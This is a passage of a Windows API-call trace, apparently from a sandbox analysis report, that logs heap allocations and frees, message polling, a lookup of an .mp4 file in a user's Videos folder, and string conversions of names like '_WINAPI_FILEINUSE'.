0x43e2790 [0104.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a79b0 [0104.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0104.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0104.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0104.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0104.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x160) returned 0x43e8260 [0104.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a79b0 | out: hHeap=0x1780000) returned 1 [0104.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0104.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0104.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0104.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0104.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4c0 [0104.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0104.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0104.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0104.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0104.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0104.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0104.628] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0104.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0104.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0104.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0104.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0104.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0104.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0104.628] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0104.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0104.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0104.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0104.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0104.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0104.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0104.628] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\38VodG.mp4", lpFindFileData=0x144e718 | out: lpFindFileData=0x144e718*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0e7ec70, ftCreationTime.dwHighDateTime=0x1d5e673, ftLastAccessTime.dwLowDateTime=0xc6aa11d0, ftLastAccessTime.dwHighDateTime=0x1d5e969, ftLastWriteTime.dwLowDateTime=0xc6aa11d0, ftLastWriteTime.dwHighDateTime=0x1d5e969, nFileSizeHigh=0x0, nFileSizeLow=0xca0e, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="38VodG.mp4", cAlternateFileName="")) returned 0x41ac700 [0104.629] FindClose (in: hFindFile=0x41ac700 | out: hFindFile=0x41ac700) returned 1 [0104.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0104.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0104.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0104.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0104.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0104.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0104.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0104.629] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0104.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0104.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0104.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0104.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2850 [0104.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0104.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0104.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0104.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0104.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0104.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca658 [0104.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0104.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0104.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0104.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0104.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0104.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0104.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0104.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0104.630] PeekMessageW (in: lpMsg=0x144e7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7b4) returned 0 [0104.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0104.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0104.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0104.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0104.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0104.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0104.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0104.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0104.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d90 [0104.630] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0104.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d90 | out: hHeap=0x1780000) returned 1 [0104.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0104.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0104.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28b0 [0104.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0104.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0104.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0104.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0104.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0104.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27d0 [0104.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0104.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0104.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0104.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28e0 [0104.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0104.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0104.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0104.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca700 [0104.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0104.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0104.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0104.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0104.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0104.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0104.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0104.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0104.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0104.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0104.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0104.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0104.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0104.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0104.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0104.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0104.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0104.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0104.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0104.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0104.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0104.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0104.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0104.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0104.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0104.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0104.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0104.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0104.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0104.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e00 [0104.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0104.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0104.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0104.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0104.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0104.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0104.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0104.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0104.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0104.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0104.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0104.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0104.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0104.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0104.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0104.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0104.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0104.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0104.632] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e29c) returned 0 [0104.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0104.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0104.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0104.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0104.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0104.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0104.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0104.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0104.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0104.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0104.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0104.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0104.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0104.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0104.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0104.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0104.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0104.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0104.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0104.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0104.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0104.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0104.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0104.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0104.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0104.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0104.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0104.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0104.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0104.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0104.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0104.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0104.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0104.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0104.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0104.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0104.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0104.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0104.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0104.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0104.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0104.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0104.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0104.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0104.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0104.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0104.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0104.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0104.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0104.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0104.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0104.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0104.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0104.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0104.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0104.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0104.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0104.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0104.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0104.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0104.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0104.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0104.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0104.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0104.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0104.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0104.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0104.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0104.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0104.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0104.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0104.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0104.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0104.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0104.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0104.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0104.636] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0104.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0104.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0104.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0104.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0104.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0104.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0104.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0104.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0104.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0104.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0104.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0104.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0104.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0104.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0104.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0104.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0104.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0104.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0104.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0104.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0104.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0104.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0104.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0104.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0104.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0104.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0104.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0104.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0104.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0104.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0104.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 